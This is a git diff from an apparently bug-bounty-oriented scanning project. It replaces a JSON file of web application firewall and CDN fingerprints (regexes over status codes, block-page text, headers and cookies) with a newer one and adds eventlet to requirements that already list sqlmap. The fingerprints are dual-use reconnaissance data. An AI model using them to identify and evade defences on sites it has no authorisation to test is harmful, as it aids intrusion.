"AzionCDN (AzionCDN)": { + "code": "", + "page": "", + "headers": "Azion([-_]CDN)?", + "cookie": "" + }, + "Barikode (Ethic Ninja)": { + "code": "", + "page": "<strong>barikode<.strong>", + "headers": "", + "cookie": "" + }, + "Bekchy (Faydata Technologies Inc.)": { + "code": "", + "page": "Bekchy.{0,10}?Access Denied|bekchy\\.com/report", + "headers": "", + "cookie": "" + }, + "Beluga CDN (Beluga)": { + "code": "", + "page": "", + "headers": "Beluga", + "cookie": "beluga_request_trail=" + }, + "BitNinja": { + "code": "", + "page": "Security check by BitNinja|Visitor anti-robot validation", + "headers": "", + "cookie": "" + }, + "Bluedon (Bluedon IST)": { + "code": "", + "page": "bluedon web application firewall", + "headers": "BDWAF", + "cookie": "" + }, + "BulletProof Security Pro (AITpro Security)": { + "code": "", + "page": "\\+?bpsMessage|403 Forbidden Error Page|If you arrived here due to a search", + "headers": "", + "cookie": "" + }, + "CacheFly CDN (CacheFly)": { + "code": "", + "page": "", + "headers": "Cachefly", + "cookie": "cfly_req.*=" + }, + "CacheWall (Varnish)": { + "code": "", + "page": "security by cachewall|403 naughty.{0,10}?not nice!|varnish cache server", + "headers": "Varnish|X-Varnish|X-Cachewall-Action|X-Cachewall-Reason", + "cookie": "" + }, + "CdnNS Application Gateway (CdnNs/WdidcNet)": { + "code": "", + "page": "cdnnswaf application gateway", + "headers": "", + "cookie": "" + }, + "WP Cerber Security (Cerber Tech": { + "code": "", + "page": "your request looks suspicious or similar to automated|our server stopped processing your request|We.re sorry.{0,10}?you are not allowed to proceed|requests from spam posting software|<title>403 Access Forbidden", + "headers": "", + "cookie": "" + }, + "Chuang Yu Shield (Yunaq)": { + "code": "", + "page": "www\\.365cyd\\.com|help\\.365cyd\\.com/cyd\\-error\\-help.html\\?code=403", + "headers": "", + "cookie": "" + }, + "ACE XML Gateway (Cisco)": { + "code": "", + "page": "", + "headers": "ACE XML Gateway", + "cookie": "" + }, + "Cloudfloor (Cloudfloor DNS)": { + "code": "", + "page": "<(title|h\\d{1})>CloudfloorDNS.{0,6}?Web Application Firewall Error|www\\.cloudfloordns\\.com/contact", + "headers": "CloudfloorDNS(.WAF)?", + "cookie": "" + }, + "Cloud Protector (Rohde & Schwarz CyberSecurity)": { + "code": "", + "page": "Cloud Protector.*?by Rohde.{3,8}?Schwarz Cybersecurity|<a href='https?://(?:www\\.)?cloudprotector\\.com/'>R.{1,6}?S.Cloud Protector", + "headers": "", + "cookie": "" + }, + "DDoS-GUARD (DDOS-GUARD CORP.)": { + "code": "", + "page": "", + "headers": "ddos-guard", + "cookie": "__ddg1.*?=|__ddg2.*?=|__ddgid.*?=|__ddgmark.*?=" + }, + "Distil (Distil Networks)": { + "code": "", + "page": "cdn\\.distilnetworks\\.com/images/anomaly\\.detected\\.png|distilCaptchaForm|distilCallbackGuard", + "headers": "", + "cookie": "" + }, + "DynamicWeb Injection Check (DynamicWeb)": { + "code": "", + "page": "by dynamic check(.{0,10}?module)?", + "headers": "dw.inj.check", + "cookie": "" + }, + "Eisoo Cloud Firewall (Eisoo)": { + "code": "", + "page": "<link.{0,10}?href=\"/eisoo\\-firewall\\-block\\.css|www\\.eisoo\\.com|&copy; \\d{4} Eisoo In", + "headers": "EisooWAF(\\-AZURE)?/?", + "cookie": "" + }, + "Azure Front Door (Microsoft)": { + "code": "", + "page": "", + "headers": "X-Azure-Ref", + "cookie": "" + }, + "GoDaddy Website Protection (GoDaddy)": { + "code": "", + "page": "GoDaddy (security|website firewall)", + "headers": "", + "cookie": "" + }, + "Greywizard": { + "code": "", + "page": "<(title|h\\d{1})>Grey Wizard|contact the website owner or Grey Wizard|We.ve detected attempted attack or non standard traffic from your ip address", + "headers": "greywizard", + "cookie": "" + }, + "Huawei Cloud Firewall (Huawei)": { + "code": "", + "page": "hwclouds\\.com|hws_security@", + "headers": "HuaweiCloudWAF", + "cookie": "HWWAFSESID=" + }, + "DataPower (IBM)": { + "code": "", + "page": "", + "headers": "X-Backside-Transport", + "cookie": "" + }, + "Imunify360 (CloudLinux)": { + "code": "", + "page": "protected.by.{0,10}?imunify360|powered.by.{0,10}?imunify360|imunify360.preloader", + "headers": "imunify360.{0,10}?", + "cookie": "" + }, + "IndusGuard (Indusface)": { + "code": "", + "page": "This website is secured against online attacks. Your request was blocked", + "headers": "IF_WAF", + "cookie": "" + }, + "Instart DX (Instart Logic)": { + "code": "", + "page": "the requested url was rejected|please consult with your administrator|your support id is", + "headers": "X-Instart-Request-ID|X-Instart-Cache|X-Instart-WL", + "cookie": "" + }, + "Janusec Application Gateway (Janusec)": { + "code": "", + "page": "janusec application gateway", + "headers": "", + "cookie": "" + }, + "KeyCDN": { + "code": "", + "page": "", + "headers": "KeyCDN", + "cookie": "" + }, + "LimeLight CDN (LimeLight)": { + "code": "", + "page": "", + "headers": "", + "cookie": "l[mg]_sessid=|limelight" + }, + "LiteSpeed (LiteSpeed Technologies)": { + "code": "403", + "page": "Proudly powered by litespeed web server|www\\.litespeedtech\\.com/error\\-page", + "headers": "LiteSpeed", + "cookie": "" + }, + "Malcare (Inactiv)": { + "code": "", + "page": "firewall.{0,15}?powered.by.{0,15}?malcare.{0,15}?pro|blocked because of malicious activities", + "headers": "", + "cookie": "" + }, + "MaxCDN": { + "code": "", + "page": "", + "headers": "maxcdn", + "cookie": "" + }, + "Mission Control Shield (Mission Control)": { + "code": "", + "page": "", + "headers": "Mission Control Application Shield", + "cookie": "" + }, + "Nemesida (PentestIt)": { + "code": "222", + "page": "@?nemesida(\\-security)?\\.com|Suspicious activity detected.{0,10}?Access to the site is blocked|nwaf@", + "headers": "", + "cookie": "" + }, + "NevisProxy (AdNovum)": { + "code": "", + "page": "", + "headers": "", + "cookie": "Navajo|NP_ID" + }, + "NexusGuard Firewall (NexusGuard)": { + "code": "", + "page": "Powered by Nexusguard|nexusguard\\.com/wafpage/.+#\\d{3};", + "headers": "", + "cookie": "" + }, + "NinjaFirewall (NinTechNet)": { + "code": "", + "page": "<title>NinjaFirewall.{0,10}?\\d{3}.forbidden|For security reasons?.{0,10}?it was blocked and logged", + "headers": "", + "cookie": "" + }, + "NSFocus (NSFocus Global Inc.)": { + "code": "", + "page": "", + "headers": "NSFocus", + "cookie": "" + }, + "NullDDoS Protection (NullDDoS)": { + "code": "", + "page": "", + "headers": "NullDDoS(.System)?", + "cookie": "" + }, + "OnMessage Shield (BlackBaud)": { + "code": "", + "page": "Blackbaud K\\-12 conducts routine maintenance|onMessage SHEILD|maintenance\\.blackbaud\\.com|status\\.blackbaud\\.com", + "headers": "onMessage Shield", + "cookie": "" + }, + "Open-Resty Lua Nginx (FLOSS)": { + "code": "406", + "page": "openresty/[0-9\\.]+?", + "headers": "openresty/[0-9\\.]+?", + "cookie": "" + }, + "PentaWAF (Global Network Services)": { + "code": "", + "page": "Penta.?Waf/[0-9\\.]+?.server", + "headers": "PentaWaf(/[0-9\\.]+)?", + "cookie": "" + }, + "PerimeterX": { + "code": "", + "page": "www\\.perimeterx\\.(com|net)/whywasiblocked|client\\.perimeterx\\.(net|com)|denied because we believe you are using automation tools", + "headers": "", + "cookie": "" + }, + "pkSecurity IDS (pkSec)": { + "code": "", + "page": "pk.?Security.?Module|Security.Alert|As this could be a potential hack attack|A safety critical (call|request) was (detected|discovered) and blocked|maximum number of reloads per minute and prevented access", + "headers": "", + "cookie": "" + }, + "PowerCDN": { + "code": "", + "page": "", + "headers": "(.*)?powercdn.com(.*)?|(.*)?powercdn.com(.*)?|PowerCDN", + "cookie": "" + }, + "PT Application Firewall (Positive Technologies)": { + "code": "", + "page": "<h1.{0,10}?Forbidden|<pre>Request.ID:.{0,10}?\\d{4}\\-(\\d{2})+.{0,35}?pre>", + "headers": "", + "cookie": "" + }, + "Puhui": { + "code": "", + "page": "", + "headers": "Puhui[\\-_]?WAF", + "cookie": "" + }, + "Qcloud (Tencent Cloud)": { + "code": "403", + "page": "\u817e\u8baf\u4e91Web\u5e94\u7528\u9632\u706b\u5899", + "headers": "", + "cookie": "" + }, + "Qiniu (Qiniu CDN)": { + "code": "", + "page": "", + "headers": "X-Qiniu-CDN", + "cookie": "" + }, + "Qrator": { + "code": "", + "page": "", + "headers": "QRATOR", + "cookie": "" + }, + "RSFirewall (RSJoomla!)": { + "code": "", + "page": "com_rsfirewall_(\\d{3}_forbidden|event)?", + "headers": "", + "cookie": "" + }, + "Sabre Firewall (Sabre)": { + "code": "", + "page": "dxsupport\\.sabre\\.com|<title>Application Firewall Error|add some important details to the email for us to investigate", + "headers": "", + "cookie": "" + }, + "Safeline (Chaitin Tech.)": { + "code": "", + "page": "safeline|<!\\-\\-\\sevent id:", + "headers": "", + "cookie": "" + }, + "SecKing (SecKing)": { + "code": "", + "page": "", + "headers": "secking(.?waf)?", + "cookie": "" + }, + "SecuPress WP Security (SecuPress)": { + "code": "", + "page": "<(title|h\\d{1})>SecuPress", + "headers": "", + "cookie": "" + }, + "Secure Entry (United Security Providers)": { + "code": "", + "page": "", + "headers": "Secure Entry Server", + "cookie": "" + }, + "SecureSphere (Imperva Inc.)": { + "code": "", + "page": "<(title|h2)>Error|The incident ID is|This page can't be displayed|Contact support for additional information", + "headers": "", + "cookie": "" + }, + "ServerDefender VP (Port80 Software)": { + "code": "", + "page": "", + "headers": "p(ort\\-)?80", + "cookie": "" + }, + "Shadow Daemon (Zecure)": { + "code": "", + "page": "<h\\d{1}>\\d{3}.forbidden<.h\\d{1}>|request forbidden by administrative rules", + "headers": "", + "cookie": "" + }, + "Shield Security (One Dollar Plugin)": { + "code": "", + "page": "You were blocked by the Shield|remaining transgression\\(s\\) against this site|Something in the URL.{0,5}?Form or Cookie data wasn\\'t appropriate", + "headers": "", + "cookie": "" + }, + "SiteGuard (Sakura Inc.)": { + "code": "", + "page": "Powered by SiteGuard|The server refuse to browse the page", + "headers": "", + "cookie": "" + }, + "SiteGround": { + "code": "", + "page": "Our system thinks you might be a robot!|access is restricted due to a security rule", + "headers": "", + "cookie": "" + }, + "Squarespace (Squarespace)": { + "code": "", + "page": "status\\.squarespace\\.com|BRICK\\-\\d{2}", + "headers": "Squarespace", + "cookie": "SS_ANALYTICS_ID=|SS_MATTR=|SS_MID=|SS_CVT=" + }, + "SquidProxy IDS (SquidProxy)": { + "code": "", + "page": "", + "headers": "squid(/[0-9\\.]+)?", + "cookie": "Access control configuration prevents your request" + }, + "StackPath": { + "code": "", + "page": "This website is using a security service to protect itself|You performed an action that triggered the service and blocked your request", + "headers": "", + "cookie": "" + }, + "TransIP Web Firewall (TransIP)": { + "code": "", + "page": "", + "headers": "X-TransIP-Backend|X-TransIP-Balancer", + "cookie": "" + }, + "UEWaf (UCloud)": { + "code": "", + "page": "/uewaf_deny_pages/default/img/|ucloud\\.cn", + "headers": "uewaf(/[0-9\\.]+)?", + "cookie": "" + }, + "URLMaster SecurityCheck (iFinity/DotNetNuke)": { + "code": "", + "page": "Ur[li]RewriteModule|SecurityCheck", + "headers": "X-UrlMaster-Debug|X-UrlMaster-Ex", + "cookie": "" + }, + "Viettel (Cloudrity)": { + "code": "", + "page": "Access Denied.{0,10}?Viettel WAF|cloudrity\\.com\\.(vn)?/|Viettel WAF System", + "headers": "", + "cookie": "" + }, + "VirusDie (VirusDie LLC)": { + "code": "", + "page": "cdn\\.virusdie\\.ru/splash/firewallstop\\.png|copy.{0,10}?Virusdie\\.ru", + "headers": "", + "cookie": "" + }, + "WebARX (WebARX Security Solutions)": { + "code": "", + "page": "WebARX.{0,10}?Web Application Firewall|www\\.webarxsecurity\\.com|/wp\\-content/plugins/webarx/includes/", + "headers": "", + "cookie": "" + }, + "WebLand": { + "code": "", + "page": "", + "headers": "protected by webland", + "cookie": "" + }, + "RayWAF (WebRay Solutions)": { + "code": "", + "page": "", + "headers": "WebRay\\-WAF|RaySrv.RayEng/[0-9\\.]+?", + "cookie": "" + }, + "WebSEAL (IBM)": { + "code": "", + "page": "This is a WebSEAL error message template file|WebSEAL server received an invalid HTTP request", + "headers": "WebSEAL", + "cookie": "" + }, + "WebTotem": { + "code": "", + "page": "The current request was blocked.{0,8}?>WebTotem", + "headers": "", + "cookie": "" + }, + "West263 CDN": { + "code": "", + "page": "", + "headers": "WS?T263CDN", + "cookie": "" + }, + "wpmudev WAF (Incsub)": { + "code": "403", + "page": "Click on the Logs tab, then the WAF Log.|Choose your site from the list|<h1>Whoops, this request has been blocked!|This request has been deemed suspicious|possible attack on our servers.", + "headers": "", + "cookie": "" + }, + "WTS-WAF (WTS)": { + "code": "", + "page": "<(title|h\\d{1})>WTS\\-WAF", + "headers": "wts/[0-9\\.]+?", + "cookie": "" + }, + "360WangZhanBao (360 Technologies)": { + "code": "493", + "page": "wzws\\-waf\\-cgi|wangshan\\.360\\.cn", + "headers": "qianxin\\-waf|WZWS-Ray|X-Powered-By-360WZB", + "cookie": "" + }, + "XLabs Security WAF (XLabs)": { + "code": "", + "page": "", + "headers": "XLabs Security|By XLabs Security", + "cookie": "" + }, + "Xuanwudun": { + "code": "", + "page": "admin\\.dbappwaf\\.cn/(index\\.php/Admin/ClientMisinform/)?|class=.(db[\\-_]?)?waf(.)?([\\-_]?row)?>", + "headers": "", + "cookie": "" + }, + "YXLink (YxLink Technologies)": { + "code": "", + "page": "", + "headers": "Yxlink([\\-_]?WAF)?", + "cookie": "yx_ci_session=|yx_language=" + } +} diff --git a/bounty_drive/waf_signatures.json b/bounty_drive/waf_signatures.json deleted file mode 100644 index d9e91b2..0000000 --- a/bounty_drive/waf_signatures.json +++ /dev/null @@ -1,332 +0,0 @@ -{ - "360 Web Application Firewall (360)" : { - "code" : "493", - "page" : "/wzws-waf-cgi/", - "headers" : "X-Powered-By-360wzb" - }, - "aeSecure" : { - "code" : "", - "page" : "aesecure_denied.png", - "headers" : "aeSecure-code" - }, - "Airlock (Phion/Ergon)" : { - "code" : "", - "page" : "", - "headers" : "AL[_-]?(SESS|LB)" - }, - "Anquanbao Web Application Firewall (Anquanbao)" : { - "code" : "405", - "page" : "/aqb_cc/error/|hidden_intercept_time", - "headers" : "X-Powered-By-Anquanbao" - }, - "Armor Protection (Armor Defense)" : { - "code" : "", - "page" : "This request has been blocked by website protection from Armor", - "headers" : "" - }, - "Application Security Manager (F5 Networks)" : { - "code" : "", - "page" : "The requested URL was rejected\\. Please consult with your administrator\\.", - "headers" : "" - }, - "Amazon Web Services Web Application Firewall (Amazon)" : { - "code" : "403", - "page" : "", - "headers" : "\\bAWS" - }, - "Yunjiasu Web Application Firewall (Baidu)" : { - "code" : "", - "page" : "", - "headers" : "yunjiasu-nginx" - }, - "Barracuda Web Application Firewall (Barracuda Networks)" : { - "code" : "", - "page" : "", - "headers" : "barra_counter_session=|(|\\b)barracuda_" - }, - "BIG-IP Application Security Manager (F5 Networks)" : { - "code" : "", - "page" : "", - "headers" : "BigIP|F5\\Z|\\bTS[0-9a-f]+=|X-WA-Info:|X-Cnection:" - }, - "BinarySEC Web Application Firewall (BinarySEC)" : { - "code" : "", - "page" : "", - "headers" : "binarysec" - }, - "BlockDoS" : { - "code" : "", - "page" : "", - "headers" : "BlockDos\\.net" - }, - "ChinaCache (ChinaCache Networks)" : { - "code" : "400", - "page" : "", - "headers" : "Powered-By-ChinaCache" - }, - "Cisco ACE XML Gateway (Cisco Systems)" : { - "code" : "", - "page" : "", - "headers" : "ACE XML Gateway" - }, - "Cloudbric Web Application Firewall (Cloudbric)" : { - "code" : "", - "page" : "Cloudbric|Malicious Code Detected", - "headers" : "" - }, - "CloudFlare Web Application Firewall (CloudFlare)" : { - "code" : "", - "page" : "Attention Required! \\| Cloudflare|CloudFlare Ray ID:|var CloudFlare=|CLOUDFLARE_ERROR_500S_BOX", - "headers" : "cloudflare|__cfduid=|cf-ray" - }, - "CloudFront (Amazon)" : { - "code" : "", - "page" : "", - "headers" : "Error from cloudfront" - }, - "Comodo Web Application Firewall (Comodo)" : { - "code" : "", - "page" : "", - "headers" : "Protected by COMODO WAF" - }, - "CrawlProtect (Jean-Denis Brun)" : { - "code" : "", - "page" : "This site is protected by CrawlProtect", - "headers" : "" - }, - "IBM WebSphere DataPower (IBM)" : { - "code" : "", - "page" : "", - "headers" : "X-Backside-Transport.*?(OK|FAIL)" - }, - "Deny All Web Application Firewall (DenyAll)" : { - "code" : "", - "page" : "Condition Intercepted", - "headers" : "sessioncookie" - }, - "Distil Web Application Firewall Security (Distil Networks)" : { - "code" : "", - "page" : "", - "headers" : "x-distil-cs" - }, - "DOSarrest (DOSarrest Internet Security)" : { - "code" : "", - "page" : "", - "headers" : "DOSarrest|X-DIS-Request-ID" - }, - "dotDefender (Applicure Technologies)" : { - "code" : "", - "page" : "dotDefender Blocked Your Request|<meta name=\\.description\\. content=\\.Applicure is the leading provider of web application security|Please contact the site administrator, and provide the following Reference ID:EdgeCast Web Application Firewall (Verizon)", - "headers" : "X-dotDefender-denied" - }, - "EdgeCast Web Application Firewall (Verizon)" : { - "code" : "400", - "page" : "", - "headers" : "SERVER.*?ECDF" - }, - "ExpressionEngine (EllisLab)" : { - "code" : "", - "page" : "Invalid (GET|POST) Data", - "headers" : "" - }, - "FortiWeb Web Application Firewall (Fortinet)" : { - "code" : "", - "page" : "\\.fgd_icon|\\.blocked|\\.authenticate", - "headers" : "FORTIWAFSID=|cookiesession1=" - }, - "Hyperguard Web Application Firewall (art of defence)" : { - "code" : "", - "page" : "", - "headers" : "ODSESSION=" - }, - "Incapsula Web Application Firewall (Incapsula/Imperva)" : { - "code" : "", - "page" : "Incapsula incident ID|_Incapsula_Resource|subject=WAF Block Page|If you feel you have been blocked in error, please contact Customer Support", - "headers" : "X-Iinfo|incap_ses|visid_incap" - }, - "ISA Server (Microsoft)" : { - "code" : "", - "page" : "The server denied the specified Uniform Resource Locator (URL)\\. Contact the server administrator\\.", - "headers" : "" - }, - "Jiasule Web Application Firewall (Jiasule)" : { - "code" : "403", - "page" : "static\\.jiasule\\.com/static/js/http_error\\.js|notice-jiasule", - "headers" : "jiasule-WAF|__jsluid=|jsl_tracking" - }, - "KS-WAF (Knownsec)" : { - "code" : "", - "page" : "ks-waf-error\\.png'", - "headers" : "" - }, - "KONA Security Solutions (Akamai Technologies)" : { - "code" : "400|403|501", - "page" : "", - "headers" : "AkamaiGHost" - }, - "ModSecurity: Open Source Web Application Firewall (Trustwave)" : { - "code" : "", - "page" : "This error was generated by Mod_Security|One or more things in your request were suspicious|rules of the mod_security module", - "headers" : "Mod_Security|NOYB" - }, - "NAXSI (NBS System)" : { - "code" : "", - "page" : "", - "headers" : "naxsi/waf" - }, - "NetContinuum Web Application Firewall (NetContinuum/Barracuda Networks)" : { - "code" : "", - "page" : "", - "headers" : "NCI__SessionId=" - }, - "NetScaler (Citrix Systems)" : { - "code" : "", - "page" : "", - "headers" : "ns_af=|citrix_ns_id|NSC_|NS-CACHE" - }, - "Newdefend Web Application Firewall (Newdefend)" : { - "code" : "", - "page" : "", - "headers" : "newdefend" - }, - "NSFOCUS Web Application Firewall (NSFOCUS)" : { - "code" : "", - "page" : "", - "headers" : "NSFocus" - }, - "Palo Alto Firewall (Palo Alto Networks)" : { - "code" : "", - "page" : "has been blocked in accordance with company policy", - "headers" : "" - }, - "Profense Web Application Firewall (Armorlogic)" : { - "code" : "", - "page" : "", - "headers" : "PLBSID=|Profense" - }, - "AppWall (Radware)" : { - "code" : "", - "page" : "Unauthorized Activity Has Been Detected.*?Case Number:", - "headers" : "X-SL-CompState" - }, - "Reblaze Web Application Firewall (Reblaze)" : { - "code" : "", - "page" : "", - "headers" : "rbzid=|Reblaze Secure Web Gateway" - }, - "ASP.NET RequestValidationMode (Microsoft)" : { - "code" : "500", - "page" : "ASP\\.NET has detected data in the request that is potentially dangerous|Request Validation has detected a potentially dangerous client input value|HttpRequestValidationException", - "headers" : "" - }, - "Safe3 Web Application Firewall" : { - "code" : "", - "page" : "", - "headers" : "Safe3" - }, - "Safedog Web Application Firewall (Safedog)" : { - "code" : "", - "page" : "", - "headers" : "WAF/2\\.0|safedog" - }, - "SecureIIS Web Server Security (BeyondTrust)" : { - "code" : "", - "page" : "SecureIIS.*?Web Server Protection|http://www\\.eeye\\.com/SecureIIS/|\\?subject=[^>]*SecureIIS Error", - "headers" : "" - }, - "SEnginx (Neusoft Corporation)" : { - "code" : "", - "page" : "SENGINX-ROBOT-MITIGATION", - "headers" : "" - }, - "TrueShield Web Application Firewall (SiteLock)" : { - "code" : "", - "page" : "SiteLock Incident ID|sitelock-site-verification|sitelock_shield_logo", - "headers" : "" - }, - "SonicWALL (Dell)" : { - "code" : "", - "page" : "This request is blocked by the SonicWALL|#shd|#nsa_banner|Web Site Blocked.*?\\bnsa_banner", - "headers" : "SonicWALL" - }, - "UTM Web Protection (Sophos)" : { - "code" : "", - "page" : "Powered by UTM Web Protection", - "headers" : "" - }, - "Stingray Application Firewall (Riverbed / Brocade)" : { - "code" : "403|500", - "page" : "", - "headers" : "X-Mapping-" - }, - "CloudProxy WebSite Firewall (Sucuri)" : { - "code" : "403", - "page" : "Access Denied.*?Sucuri Website Firewall|Sucuri WebSite Firewall.*?Access Denied|Questions\\?.*?cloudproxy@sucuri\\.net", - "headers" : "Sucuri/Cloudproxy|X-Sucuri" - }, - "Tencent Cloud Web Application Firewall (Tencent Cloud Computing)" : { - "code" : "405", - "page" : "waf\\.tencent-cloud\\.com", - "headers" : "" - }, - "Teros/Citrix Application Firewall Enterprise (Teros/Citrix Systems)" : { - "code" : "", - "page" : "", - "headers" : "st8(id|_wat|_wlf)" - }, - "TrafficShield (F5 Networks)" : { - "code" : "", - "page" : "", - "headers" : "F5-TrafficShield|ASINFO=" - }, - "UrlScan (Microsoft)" : { - "code" : "", - "page" : "Rejected-By-UrlScan", - "headers" : "Rejected-By-UrlScan" - }, - "USP Secure Entry Server (United Security Providers)" : { - "code" : "", - "page" : "", - "headers" : "Secure Entry Server" - }, - "Varnish FireWall (OWASP)" : { - "code" : "", - "page" : "Request rejected by xVarnish-WAF|\\bXID: \\d+", - "headers" : "" - }, - "Wallarm Web Application Firewall (Wallarm)" : { - "code" : "", - "page" : "", - "headers" : "nginx-wallarm" - }, - "WatchGuard (WatchGuard Technologies)" : { - "code" : "", - "page" : "", - "headers" : "WatchGuard" - }, - "WebKnight Application Firewall (AQTRONIX)" : { - "code" : "999", - "page" : "WebKnight Application Firewall Alert|AQTRONIX WebKnight", - "headers" : "WebKnight" - }, - "Wordfence (Feedjit)" : { - "code" : "", - "page" : "This response was generated by Wordfence|Your access to this site has been limited", - "headers" : "" - }, - "Zenedge Web Application Firewall (Zenedge)" : { - "code" : "", - "page" : "zenedge/assets/", - "headers" : "ZENEDGE" - }, - "Yundun Web Application Firewall (Yundun)" : { - "code" : "", - "page" : "", - "headers" : "YUNDUN" - }, - "Yunsuo Web Application Firewall (Yunsuo)" : { - "code" : "", - "page" : "<img class=.yunsuologo.", - "headers" : "yunsuo_session" - } -} diff --git a/requirements.txt b/requirements.txt index 704d8d0..feec47d 100644 --- a/requirements.txt +++ b/requirements.txt @@ -4,3 +4,4 @@ tqdm selenium webdriver_manager sqlmap +eventlet \ No newline at end of file